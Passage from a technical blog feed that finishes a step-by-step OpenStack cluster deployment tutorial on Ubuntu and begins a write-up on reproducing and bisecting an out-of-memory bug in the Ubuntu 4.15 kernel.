<p>It seems ebtables comes in both the <code class="language-plaintext highlighter-rouge">ebtables</code> and <code class="language-plaintext highlighter-rouge">iptables</code> packages, and at
different versions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ebtabls --version
Command 'ebtabls' not found, did you mean:
command 'ebtables' from deb ebtables (2.0.10.4+snapshot20181205-1ubuntu1)
command 'ebtables' from deb iptables (1.8.3-2ubuntu5)
Try: sudo apt install <deb name>
</code></pre></div></div>
<p>It seems <code class="language-plaintext highlighter-rouge">ebtables</code> is managed by <code class="language-plaintext highlighter-rouge">alternatives</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ll /usr/sbin/ebtables
16:12 lrwxrwxrwx 1 root root 26 Oct 17 13:09 /usr/sbin/ebtables -> /etc/alternatives/ebtables*
</code></pre></div></div>
<p>Let’s change that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ /usr/sbin/ebtables --version
ebtables 1.8.3 (nf_tables)
$ sudo update-alternatives --config ebtables
There are 2 choices for the alternative ebtables (providing /usr/sbin/ebtables).
Selection Path Priority Status
------------------------------------------------------------
* 0 /usr/sbin/ebtables-nft 10 auto mode
1 /usr/sbin/ebtables-legacy 10 manual mode
2 /usr/sbin/ebtables-nft 10 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/sbin/ebtables-legacy to provide /usr/sbin/ebtables (ebtables) in manual mode
$ ebtables --version
ebtables v2.0.10.4 (legacy) (December 2011)
</code></pre></div></div>
<p>Much better. Version 1.8.3 does not implement the <code class="language-plaintext highlighter-rouge">among</code> match, while version 2.0.10.4
does. I highly recommend updating the <code class="language-plaintext highlighter-rouge">alternatives</code> entry for ebtables right now
if you are following this blog post.</p>
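<p>If you have more than one compute node to fix, the same change can be made
non-interactively; a small sketch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo update-alternatives --set ebtables /usr/sbin/ebtables-legacy
$ ebtables --version
ebtables v2.0.10.4 (legacy) (December 2011)
</code></pre></div></div>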
<p>After this, restart the Neutron services on the compute node.</p>
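<p>For the Linux bridge setup used in this guide, that should just be the one agent:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart neutron-linuxbridge-agent
</code></pre></div></div>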
<h1 id="final-configuration">Final Configuration</h1>
<p>If you have made it this far, then congratulations. You have a cluster which is
nearly all set up and ready to begin launching instances.</p>
<p>Before we can launch our first instance, we just need to set up some virtual
networks, add a keypair used for SSH, create some security group rules so we
aren’t firewalled out, and create some instance flavours so we can launch
virtual machines of differing specifications.</p>
<h2 id="configuring-virtual-networks">Configuring Virtual Networks</h2>
<p>We need to tell OpenStack about our provider network on 203.0.113.0/24, and what
ranges of IP addresses we want to assign:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack network create --share --provider-physical-network provider \
--provider-network-type flat provider
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| admin_state_up | UP |
| availability_zone_hints | |
| availability_zones | |
| created_at | 2020-02-12T04:05:26Z |
| description | |
| dns_domain | None |
| id | 01ae2817-9697-430f-bdd4-6435d45dbbda |
| ipv4_address_scope | None |
| ipv6_address_scope | None |
| is_default | None |
| is_vlan_transparent | None |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| mtu | 1500 |
| name | provider |
| port_security_enabled | True |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| provider:network_type | flat |
| provider:physical_network | provider |
| provider:segmentation_id | None |
| qos_policy_id | None |
| revision_number | 1 |
| router:external | Internal |
| segments | None |
| shared | True |
| status | ACTIVE |
| subnets | |
| tags | |
| updated_at | 2020-02-12T04:05:26Z |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack subnet create --network provider --allocation-pool start=203.0.113.101,end=203.0.113.250 --dns-nameserver 8.8.8.8 --gateway 203.0.113.1 --subnet-range 203.0.113.0/24 provider
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| allocation_pools | 203.0.113.101-203.0.113.250 |
| cidr | 203.0.113.0/24 |
| created_at | 2020-02-12T04:05:37Z |
| description | |
| dns_nameservers | 8.8.8.8 |
| enable_dhcp | True |
| gateway_ip | 203.0.113.1 |
| host_routes | |
| id | 6e854541-fc59-4639-947b-a074efc05463 |
| ip_version | 4 |
| ipv6_address_mode | None |
| ipv6_ra_mode | None |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| name | provider |
| network_id | 01ae2817-9697-430f-bdd4-6435d45dbbda |
| prefix_length | None |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| revision_number | 0 |
| segment_id | None |
| service_types | |
| subnetpool_id | None |
| tags | |
| updated_at | 2020-02-12T04:05:37Z |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
</code></pre></div></div>
<p>We can list networks with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack network list
+--------------------------------------+----------+--------------------------------------+
| ID | Name | Subnets |
+--------------------------------------+----------+--------------------------------------+
| 01ae2817-9697-430f-bdd4-6435d45dbbda | provider | 6e854541-fc59-4639-947b-a074efc05463 |
+--------------------------------------+----------+--------------------------------------+
</code></pre></div></div>
<h2 id="creating-some-flavours">Creating Some Flavours</h2>
<p>We need to tell OpenStack what sets of specifications we wish to assign to
instances; these sets are called flavours.</p>
<p>We will add a few of them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack flavor create --id 0 --vcpus 1 --ram 64 --disk 1 m1.nano\
+----------------------------+---------+
| Field | Value |
+----------------------------+---------+
| OS-FLV-DISABLED:disabled | False |
| OS-FLV-EXT-DATA:ephemeral | 0 |
| disk | 1 |
| id | 0 |
| name | m1.nano |
| os-flavor-access:is_public | True |
| properties | |
| ram | 64 |
| rxtx_factor | 1.0 |
| swap | |
| vcpus | 1 |
+----------------------------+---------+
$ openstack flavor create --id 1 --vcpus 1 --ram 128 --disk 2 m1.small
$ openstack flavor create --id 2 --vcpus 1 --ram 256 --disk 3 m1.large
$ openstack flavor create --id 3 --vcpus 2 --ram 512 --disk 5 m1.xlarge
</code></pre></div></div>
<p>We can list all flavours with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack flavor list
+----+-----------+-----+------+-----------+-------+-----------+
| ID | Name | RAM | Disk | Ephemeral | VCPUs | Is Public |
+----+-----------+-----+------+-----------+-------+-----------+
| 0 | m1.nano | 64 | 1 | 0 | 1 | True |
| 1 | m1.small | 128 | 2 | 0 | 1 | True |
| 2 | m1.large | 256 | 3 | 0 | 1 | True |
| 3 | m1.xlarge | 512 | 5 | 0 | 2 | True |
+----+-----------+-----+------+-----------+-------+-----------+
</code></pre></div></div>
<h2 id="adding-a-ssh-keypair">Adding a SSH Keypair</h2>
<p>We need to seed the instance with an SSH keypair that we can use to connect to it.</p>
<p>Let’s make a new SSH keypair for the demo user and add it to the keypair store.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . demo-openrc
$ ssh-keygen -q -N ""
$ openstack keypair create --public-key ~/.ssh/id_rsa.pub mykey
+-------------+-------------------------------------------------+
| Field | Value |
+-------------+-------------------------------------------------+
| fingerprint | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
| name | mykey |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
+-------------+-------------------------------------------------+
</code></pre></div></div>
<p>We can check our list of keys with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack keypair list
+-------+-------------------------------------------------+
| Name | Fingerprint |
+-------+-------------------------------------------------+
| mykey | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
+-------+-------------------------------------------------+
</code></pre></div></div>
<h2 id="creating-a-basic-security-group">Creating a Basic Security Group</h2>
<p>We need to create a basic security group for our instances so we can connect
to them. For now, we will allow SSH and ICMP through the firewall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack security group rule create --proto icmp default
$ openstack security group rule create --proto icmp default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at | 2020-02-06T03:52:15Z |
| description | |
| direction | ingress |
| ether_type | IPv4 |
| id | 4ec97531-46d7-4c26-bb38-6d122f077168 |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name | None |
| port_range_max | None |
| port_range_min | None |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| protocol | icmp |
| remote_group_id | None |
| remote_ip_prefix | 0.0.0.0/0 |
| revision_number | 0 |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580 |
| tags | [] |
| updated_at | 2020-02-06T03:52:15Z |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack security group rule create --proto tcp --dst-port 22 default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at | 2020-02-06T03:52:46Z |
| description | |
| direction | ingress |
| ether_type | IPv4 |
| id | 54332a65-d89e-49ac-9756-fd72ad2c18ee |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name | None |
| port_range_max | 22 |
| port_range_min | 22 |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| protocol | tcp |
| remote_group_id | None |
| remote_ip_prefix | 0.0.0.0/0 |
| revision_number | 0 |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580 |
| tags | [] |
| updated_at | 2020-02-06T03:52:46Z |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
</code></pre></div></div>
<p>We can list security groups with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack security group list
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ID | Name | Description | Project | Tags |
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ecea2521-11a6-4e2d-b979-6d5c59bd1580 | default | Default security group | 33569bb56110474db2d584b4a1936c6b | [] |
+--------------------------------------+---------+------------------------+----------------------------------+------+
</code></pre></div></div>
<h1 id="launching-an-instance">Launching an Instance</h1>
<p>Everything should be set now. Go ahead and launch your first instance with the
cirros image we previously uploaded into Glance.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack server create --flavor m1.nano --image cirros --nic net-id=01ae2817-9697-430f-bdd4-6435d45dbbda \
--security-group default --key-name mykey myfirstinstance
+-----------------------------+-----------------------------------------------+
| Field | Value |
+-----------------------------+-----------------------------------------------+
| OS-DCF:diskConfig | MANUAL |
| OS-EXT-AZ:availability_zone | |
| OS-EXT-STS:power_state | NOSTATE |
| OS-EXT-STS:task_state | scheduling |
| OS-EXT-STS:vm_state | building |
| OS-SRV-USG:launched_at | None |
| OS-SRV-USG:terminated_at | None |
| accessIPv4 | |
| accessIPv6 | |
| addresses | |
| adminPass | Q9XtMEM56LnW |
| config_drive | |
| created | 2020-02-12T04:06:59Z |
| flavor | m1.nano (0) |
| hostId | |
| id | 8b16810d-1c9c-4094-b794-f2929388623c |
| image | cirros (5ad293f2-1d07-44ae-8a23-19d619885a3b) |
| key_name | mykey |
| name | myfirstinstance |
| progress | 0 |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| properties | |
| security_groups | name='ecea2521-11a6-4e2d-b979-6d5c59bd1580' |
| status | BUILD |
| updated | 2020-02-12T04:06:59Z |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
| volumes_attached | |
+-----------------------------+-----------------------------------------------+
</code></pre></div></div>
<p>That begins provisioning a new virtual machine on the compute
node with the m1.nano flavour.</p>
<p>We can check the status of our instance with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack server list
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| ID | Name | Status | Networks | Image | Flavor |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| 8b16810d-1c9c-4094-b794-f2929388623c | myfirstinstance | ACTIVE | provider=203.0.113.103 | cirros | m1.nano |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
</code></pre></div></div>
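<p>If the instance sits in BUILD for a while, or SSH is not up yet, the boot
console output can also be pulled from the CLI, sketched below with the instance
name we used above:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack console log show myfirstinstance
</code></pre></div></div>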
<p>We can also check the status from Horizon:</p>
<p><img src="/assets/images/2020_008.png" alt="status" /></p>
<p>From there, we can go ahead and SSH into it, with the “cirros” user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh cirros@203.0.113.103
The authenticity of host '203.0.113.103 (203.0.113.103)' can't be established.
ECDSA key fingerprint is SHA256:cs620jJtz28Xum30RluDJ4cLjQ7WzB89xhAxoWcODSk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '203.0.113.103' (ECDSA) to the list of known hosts.
$ uname -rv
4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:09:13 UTC 2016
$ hostname
myfirstinstance
$ free -m
total used free shared buffers
Mem: 46 34 11 0 3
-/+ buffers: 31 15
Swap: 0 0 0
</code></pre></div></div>
<p>You know, if you made it this far, and have a working OpenStack cluster, you
deserve a medal! Really, excellent work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ figlet Well Done!
__ __ _ _ ____ _
\ \ / /__| | | | _ \ ___ _ __ ___| |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ |
\ V V / __/ | | | |_| | (_) | | | | __/_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_)
</code></pre></div></div>
<h1 id="useful-things-we-can-do-from-horizon">Useful Things We Can Do From Horizon</h1>
<p>Horizon aims to implement most of the tasks users perform on a regular basis,
which is primarily creating and managing the virtual machines they wish to
provision. Horizon can do some neat things to help users with that:</p>
<p>Horizon can display everything you want to know about your instance:</p>
<p><img src="/assets/images/2020_009.png" alt="information" /></p>
<p>Horizon can show you network interfaces on your instance:</p>
<p><img src="/assets/images/2020_010.png" alt="network" /></p>
<p>Horizon can give you a listing of the instance’s syslog:</p>
<p><img src="/assets/images/2020_011.png" alt="log" /></p>
<p>Horizon can even give you a web based VNC-like remote terminal to your instance:</p>
<p><img src="/assets/images/2020_012.png" alt="novnc" /></p>
<p>Of course, Horizon can also help you launch instances:</p>
<p><img src="/assets/images/2020_013.png" alt="launch" /></p>
<h1 id="conclusion">Conclusion</h1>
<p>Well, I have to say, this blog post has been an absolute journey. OpenStack is
by far the most complicated software package that I have ever installed and
configured, in both the time required and the sheer number of moving parts.</p>
<p>I started this post with only a vague idea of what OpenStack is and what it does,
but after installing each of the primary services, configuring them, and
seeing how they come together, I now understand the purpose of each service and
sub-service, and have a good idea of how they are implemented and the design
decisions behind them.</p>
<p>We haven’t touched much on using and debugging OpenStack, since this
blog post is much too long already, but that will be coming in the future.</p>
<p>I hope you enjoyed the read, and if you have been following along, I hope you
have a working cluster.</p>
<p>As always, if you have any questions, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellThe next article in my series of learning about cloud computing is tackling one of the larger and more widely used cloud software packages - OpenStack. OpenStack is a service which lets you provision and manage virtual machines across a pool of hardware which may have differing specifications and vendors. Today, we will be deploying a small five node OpenStack cluster in Ubuntu 19.10 Eoan Ermine, so follow along, and let’s get this cluster running. We will cover what OpenStack is, the services it is comprised of, how to deploy it, and using our cluster to provision some virtual machines. Let’s get started.Analysis of an Out Of Memory Kernel Bug in the Ubuntu 4.15 Kernel2019-12-13T00:00:00+00:002019-12-13T00:00:00+00:00https://ruffell.nz/programming/writeups/2019/12/13/analysis-of-out-of-memory-kernel-bug-in-ubuntu-4-15-kernel<p>As mentioned previously, I will write about particularly interesting cases I
have worked from start to completion from time to time on this blog.</p>
<p>This is another of those cases. Today, we are going to look at a case where
creating a seemingly innocent RAID array triggers a kernel bug which causes the
system to allocate all of its memory and subsequently crash.</p>
<p><img src="/assets/images/2019_283.png" alt="hero" /></p>
<p>Let’s start digging into this and get this fixed.</p>
<!--more-->
<h1 id="reproducing-the-issue">Reproducing the Issue</h1>
<p>Before we start hunting for kernel commits to see if we can fix the problem, it
is always a good idea to reproduce the issue if possible and see what we can
learn. This gives us a fresh set of logs on small isolated test systems, so we
can be sure the command we previously ran caused the issue and not something
else that may be running on a customer system.</p>
<p>Reading the case, the complaint is that when trying to format a RAID array of
several disks with the xfs file system, the system hangs for a short time, ssh
sessions disconnect, and if you reconnect, dmesg shows that the Out Of Memory
(OOM) reaper has come out and killed most processes, including the SSH daemon.</p>
<p>The case mentions that the underlying disks are NVMe devices, so we will try and
reproduce using NVMe disks.</p>
<p>Again, my system does not have any NVMe devices, let alone 8 of them, so we will
use a cloud computing service for a test system. Google Cloud Platform
is probably the best fit for this case, since it lets you easily add any number of
NVMe-based scratch disks to your instance.</p>
<p>Open up the dashboard, and create a new instance. Select Ubuntu 18.04 as the
operating system, and leave the main disk as 10GB. Head down to the “Add
additional disks” section, and from the dropdown, select “Local SSD Scratch disk”
and make sure they are NVMe. In the number of disks, drag the slider to 8.</p>
<p><img src="/assets/images/2019_284.png" alt="gcp" /></p>
<p>Go ahead and make the instance. It might be a little pricey, but we aren’t going
to be using this instance for too long, so make sure to terminate it as soon
as you are finished with it.</p>
<p>SSH into the instance. To reproduce, we need to be running the 4.15.0-58-generic
kernel, so we can install that like so:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">sudo apt update</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo apt install linux-image-4.15.0-58-generic linux-modules-4.15.0-58-generic linux-modules-extra-4.15.0-58-generic linux-headers-4.15.0-58 linux-headers-4.15.0-58-generic</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo nano /etc/default/grub</code>
<ul>
<li>Change <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT=0</code> to <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT="1>2"</code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">sudo nano /etc/default/grub.d/50-cloudimg-settings.cfg</code>
<ul>
<li>Comment out <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT=0</code> with a <code class="language-plaintext highlighter-rouge">#</code>.</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">sudo update-grub</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo reboot</code></li>
</ol>
<p>This installs the 4.15.0-58 kernel and changes the grub config to boot into it
by default, since we can’t open the grub menu on cloud instances.</p>
<p>Once the instance comes back up again, check <code class="language-plaintext highlighter-rouge">uname -rv</code> to ensure we are in
the correct kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ uname -rv
4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019
</code></pre></div></div>
<p>Good. Let’s see which devices our NVMe disks are:</p>
<p><img src="/assets/images/2019_285.png" alt="lsblk" /></p>
<p>They seem to follow the <code class="language-plaintext highlighter-rouge">nvme0nX</code> naming.</p>
<p>Time to reproduce. Create a RAID array with:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">sudo su</code></li>
<li><code class="language-plaintext highlighter-rouge">mdadm --create /dev/md0 --level=0 --raid-devices=8 /dev/nvme0n1 /dev/nvme0n2 /dev/nvme0n3 /dev/nvme0n4 /dev/nvme0n5 /dev/nvme0n6 /dev/nvme0n7 /dev/nvme0n8</code></li>
<li><code class="language-plaintext highlighter-rouge">mkfs.xfs -f /dev/md0</code></li>
</ol>
<p>Nothing will happen for a few seconds, and then the SSH session will disconnect:</p>
<p><img src="/assets/images/2019_286.png" alt="repro" /></p>
<p>Pretty strange behaviour really. Reconnect, and examine dmesg:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CPU: 0 PID: 776 Comm: systemd-network Not tainted 4.15.0-58-generic #64-Ubuntu
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
dump_stack+0x63/0x8b
dump_header+0x71/0x285
oom_kill_process+0x220/0x440
out_of_memory+0x2d1/0x4f0
__alloc_pages_slowpath+0xa53/0xe00
? alloc_pages_current+0x6a/0xe0
__alloc_pages_nodemask+0x29a/0x2c0
alloc_pages_current+0x6a/0xe0
__page_cache_alloc+0x81/0xa0
filemap_fault+0x378/0x6f0
? filemap_map_pages+0x181/0x390
ext4_filemap_fault+0x31/0x44
__do_fault+0x24/0xe5
__handle_mm_fault+0xdef/0x1290
handle_mm_fault+0xb1/0x1f0
__do_page_fault+0x281/0x4b0
do_page_fault+0x2e/0xe0
? page_fault+0x2f/0x50
page_fault+0x45/0x50
</code></pre></div></div>
<p>We see a fairly standard call trace saying the system hit a page fault, and when
it tried to allocate a new page with <code class="language-plaintext highlighter-rouge">__page_cache_alloc()</code>, that allocation failed,
taking the slowpath, which realised the system was out of memory and invoked the
OOM reaper.</p>
<p>Reading down, we find a printout of all the memory currently held in the unreclaimable slab caches.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unreclaimable slab info:
Name Used Total
RAWv6 15KB 15KB
UDPv6 15KB 15KB
TCPv6 31KB 31KB
mqueue_inode_cache 7KB 7KB
fuse_request 3KB 3KB
RAW 7KB 7KB
tw_sock_TCP 3KB 3KB
request_sock_TCP 3KB 3KB
TCP 16KB 16KB
hugetlbfs_inode_cache 7KB 7KB
eventpoll_pwq 7KB 7KB
eventpoll_epi 8KB 8KB
request_queue 118KB 311KB
dmaengine-unmap-256 30KB 30KB
dmaengine-unmap-128 15KB 15KB
file_lock_cache 3KB 3KB
net_namespace 27KB 27KB
shmem_inode_cache 476KB 550KB
taskstats 7KB 7KB
sigqueue 3KB 3KB
kernfs_node_cache 6726KB 6968KB
mnt_cache 146KB 146KB
filp 92KB 152KB
lsm_file_cache 35KB 35KB
nsproxy 3KB 3KB
vm_area_struct 74KB 108KB
mm_struct 61KB 61KB
files_cache 22KB 22KB
signal_cache 88KB 88KB
sighand_cache 185KB 185KB
task_struct 517KB 540KB
cred_jar 47KB 47KB
anon_vma 106KB 106KB
pid 114KB 140KB
Acpi-Operand 74KB 74KB
Acpi-ParseExt 7KB 7KB
Acpi-State 11KB 11KB
Acpi-Namespace 15KB 15KB
numa_policy 3KB 3KB
trace_event_file 122KB 122KB
ftrace_event_field 167KB 167KB
task_group 39KB 39KB
kmalloc-8192 1344KB 1344KB
kmalloc-4096 856KB 960KB
kmalloc-2048 1346KB 1424KB
kmalloc-1024 1042KB 1064KB
kmalloc-512 466KB 480KB
kmalloc-256 3499256KB 3499256KB
kmalloc-192 311KB 311KB
kmalloc-128 1156KB 1156KB
kmalloc-96 155KB 216KB
kmalloc-64 367KB 432KB
kmalloc-32 336KB 336KB
kmalloc-16 60KB 60KB
kmalloc-8 32KB 32KB
kmem_cache_node 80KB 80KB
kmem_cache 396KB 453KB
</code></pre></div></div>
<p>Everything looks pretty normal, apart from the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab. If you are
unfamiliar with how kernel memory allocation works in Linux, maybe take a moment
and read the blog post I wrote on it here:</p>
<p><a href="https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html">Looking at kmalloc() and the SLUB Memory Allocator</a></p>
<p>Back to the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab. Looking at it, there is 3499256KB used!
Converting 3499256KB to gigabytes gives us roughly 3.5GB. Our little cloud instance
only has 3.75GB of RAM by default, so it seems something has caused all the
system memory to get caught up in the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab.</p>
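<p>If you are reproducing this yourself, you can watch the slab grow in real
time from a second SSH session. A sketch, reading <code class="language-plaintext highlighter-rouge">/proc/slabinfo</code>, which
requires root:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo watch -n 1 "grep kmalloc-256 /proc/slabinfo"
</code></pre></div></div>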
<h1 id="finding-a-workaround">Finding a Workaround</h1>
<p>The next thing to do is try some other kernels to see if we can reproduce.</p>
<p>I tried the Bionic HWE kernel, based on the 5.0 kernel that Ubuntu 19.04 Disco
Dingo uses. I wasn’t able to reproduce the issue.</p>
<p>The next thing I tried was a previous Bionic kernel. The previous released kernel
is 4.15.0-55-generic, and I wasn’t able to reproduce there either.</p>
<p>Both are good news. Anyone affected by this bug can use the previous kernel or
the HWE kernel while this gets fixed. It also tells us that the problem was introduced
somewhere between 4.15.0-55 and 4.15.0-58.</p>
<h1 id="searching-for-the-root-cause">Searching for the Root Cause</h1>
<p>Time to dive into the commits for the kernel to see if we can determine anything
from a quick look.</p>
<p>We know the problem was introduced somewhere between 4.15.0-55 and 4.15.0-58, so
let’s have a look at those releases.</p>
<p>If we look at the git tree located at:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://kernel.ubuntu.com/ubuntu/ubuntu-bionic.git
</code></pre></div></div>
<p>There are four tags we are interested in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git tag
...
Ubuntu-4.15.0-55.60
Ubuntu-4.15.0-56.62
Ubuntu-4.15.0-57.63
Ubuntu-4.15.0-58.64
...
</code></pre></div></div>
<p>We can use <code class="language-plaintext highlighter-rouge">git log</code> to see what is in each tag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git log --oneline Ubuntu-4.15.0-57.63..Ubuntu-4.15.0-58.64
9bff5f095923 (tag: Ubuntu-4.15.0-58.64) UBUNTU: Ubuntu-4.15.0-58.64
fca95d49540c Revert "new primitive: discard_new_inode()"
90c14a74ff26 Revert "ovl: set I_CREATING on inode being created"
544300b72249 UBUNTU: Start new release
</code></pre></div></div>
<p>It seems some small regressions were reverted in 4.15.0-58, and it is otherwise a small
release, likely made late in the SRU cycle.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --oneline Ubuntu-4.15.0-56.62..Ubuntu-4.15.0-57.63
7c905029d1e1 (tag: Ubuntu-4.15.0-57.63) UBUNTU: Ubuntu-4.15.0-57.63
3536b6c0146c x86/speculation/swapgs: Exclude ATOMs from speculation through SWAPGS
fb8801640c8d x86/entry/64: Use JMP instead of JMPQ
1592edcea558 x86/speculation: Enable Spectre v1 swapgs mitigations
2efd2444a88e x86/speculation: Prepare entry code for Spectre v1 swapgs mitigations
cdb3893f2b04 x86/cpufeatures: Combine word 11 and 12 into a new scattered features word
a015c7c9e9f7 x86/cpufeatures: Carve out CQM features retrieval
ebd969e74a54 UBUNTU: update dkms package versions
29331dc18182 UBUNTU: Start new release
</code></pre></div></div>
<p>4.15.0-57 seems pretty quiet as well. It appears to contain the fixes for CVE-2019-1125, also
not unusual to land late in an SRU cycle.</p>
<p>The flaw is likely to fall into 4.15.0-56 then:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --oneline Ubuntu-4.15.0-55.60..Ubuntu-4.15.0-56.62 | wc -l
2787
</code></pre></div></div>
<p>2787 commits are present in 4.15.0-56! That is one big release, and we aren’t
going to be able to read all of those commits.</p>
<p>I had a good read through all the subjects, and examined many commits, but
nothing in the block, filesystem, or NVMe subsystems immediately jumped out as
something that could cause the kernel to run away allocating memory until none
is left.</p>
<p>Since we are limited on time, know definitive start and end points for
where the behaviour was introduced, and can easily reproduce the issue ourselves,
this case is a good candidate for a <code class="language-plaintext highlighter-rouge">git bisect</code>.</p>
<p><code class="language-plaintext highlighter-rouge">git bisect</code> is a tool which uses a basic binary search algorithm to home in on
a commit which breaks things. At each iteration, the midway point between the
known good and bad commits is selected for testing. This lets us get through all
2787 commits in as few as 12 or so tests.</p>
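<p>As a quick sanity check on that number (a back of the envelope calculation,
not part of the original debugging session):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python3 -c "import math; print(math.ceil(math.log2(2787)))"
12
</code></pre></div></div>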
<p>We need to tell git bisect what tag is good and what tag is bad. We can do that
like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect start Ubuntu-4.15.0-56.62 Ubuntu-4.15.0-55.60
Bisecting: 1393 revisions left to test after this (roughly 11 steps)
[9cac6a2d2438924773cef5b30eab8f72d5a5ea3f] selftests/x86: Add clock_gettime() tests to test_vdso
</code></pre></div></div>
<p>We will look between 4.15.0-55, which was good, and 4.15.0-56, which was bad.</p>
<p>From here, we can go and build a test kernel, create a new cloud instance with
lots of NVMe disks and try and reproduce. After doing all this, I can say that
commit 9cac6a2d2438924773cef5b30eab8f72d5a5ea3f, which is halfway between
4.15.0-55 and 4.15.0-56, is good, and the problem could not be reproduced.</p>
<p>So I tell git that.</p>
